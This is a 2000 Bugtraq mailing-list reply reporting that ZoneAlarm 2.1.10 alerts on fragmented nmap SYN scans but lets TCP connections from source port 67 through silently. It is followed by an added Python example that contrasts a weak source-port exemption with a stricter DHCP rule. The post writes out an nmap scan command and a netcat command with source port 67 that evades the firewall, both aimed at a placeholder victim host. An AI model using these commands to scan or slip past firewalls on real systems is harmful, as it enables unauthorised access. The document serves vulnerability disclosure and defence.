Bugtraq mailing list archives
Re: ZoneAlarm
From: vision () WHITEHATS COM (Max Vision)
Date: Wed, 26 Apr 2000 02:50:33 -0700
On Mon, 24 Apr 2000, Alfred Huger wrote:
Additionally, using nmap's -f flag allows you to send traffic past ZoneAlarm without any alerts.

I set up a copy on a local machine here and while I found that source port scans from 67 slipped past the firewall -f seemed to be alerted on just fine. Can anyone else comment to this?
Hi Al,

I get the same results you did; ZoneAlarm 2.1.10 alerts on a fragmented SYN scan, but does not make any noise when the source port is set to 67.

# nmap -sS -p 139 -v -f -P0 victim.example.com
Initiating SYN half-open stealth scan against victim.example.com (23.23.23.23)

04/26-02:11:52.260668 attacker -> 23.23.23.23
TCP TTL:61 TOS:0x0 ID:15452 MF
Frag Offset: 0x0 Frag Size: 0x10
BC 49 00 8B 4D 4B C7 11 00 00 00 00 50 02 08 00 .I..MK......P...

04/26-02:11:52.260745 attacker -> 23.23.23.23
TCP TTL:61 TOS:0x0 ID:15452
Frag Offset: 0x2 Frag Size: 0x4
CA 49 00 00 .I..

ZoneAlarm reports "The firewall has blocked Internet access to your computer (NetBIOS Session) from attacker.example.com (TCP Port 3133)."

When I add the option for source port 67 (-g 67) ZoneAlarm does not alert - however, the packets do not seem to be delivered either (no RST nor SYN+ACK).

Now if you remove fragmentation from the picture, it looks like you can use source porting (67 anyway) to circumvent the ZoneAlarm software.

# nc -p 67 victim.example.com 21
220 Serv-U FTP-Server v2.5e for WinSock ready...
quit

Without the bootp source port this connection is dropped and an alert is generated.

Max
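Added example, not part of the post above and not ZoneAlarm's code: a filter exemption keyed on source port alone, next to one narrowed to an actual DHCP reply (UDP 67 to 68). That the observed behaviour stems from such a source-port-only exemption is an assumption the thread does not confirm; the packets, addresses and function names are constructed for illustration.

```python
import struct

BOOTPS, BOOTPC = 67, 68   # BOOTP/DHCP server and client ports (UDP only)
TCP, UDP = 6, 17          # IPv4 protocol numbers

def build_packet(proto, sport, dport):
    """Constructed sample: 20-byte IPv4 header plus the two port fields."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 24, 0, 0, 64, proto, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return ip + struct.pack("!HH", sport, dport)

def parse(pkt):
    """Return (protocol, source port, destination port) of a raw IPv4 packet."""
    ihl = (pkt[0] & 0x0F) * 4          # header length in bytes
    proto = pkt[9]
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
    return proto, sport, dport

def weak_allow(pkt):
    """Assumed flawed exemption: trust anything whose source port is 67."""
    _, sport, _ = parse(pkt)
    return sport == BOOTPS

def strict_allow(pkt):
    """Narrowed exemption: only UDP from port 67 to the DHCP client port 68."""
    proto, sport, dport = parse(pkt)
    return proto == UDP and sport == BOOTPS and dport == BOOTPC

def evaluate(rule, packets):
    """Map each sample name to True (exempted) or False (normal filtering)."""
    return {name: rule(pkt) for name, pkt in packets.items()}

# Constructed inputs mirroring the cases discussed in the thread.
SAMPLES = {
    "dhcp_reply": build_packet(UDP, 67, 68),
    "tcp_sport67_to_ftp": build_packet(TCP, 67, 21),
    "tcp_ephemeral_to_ftp": build_packet(TCP, 3133, 21),
    "udp_sport67_to_netbios": build_packet(UDP, 67, 137),
}

if __name__ == "__main__":
    for label, rule in (("weak", weak_allow), ("strict", strict_allow)):
        print(label, evaluate(rule, SAMPLES))
```

Under the narrowed rule only the DHCP reply is exempted; every other packet falls through to the normal block-and-alert path.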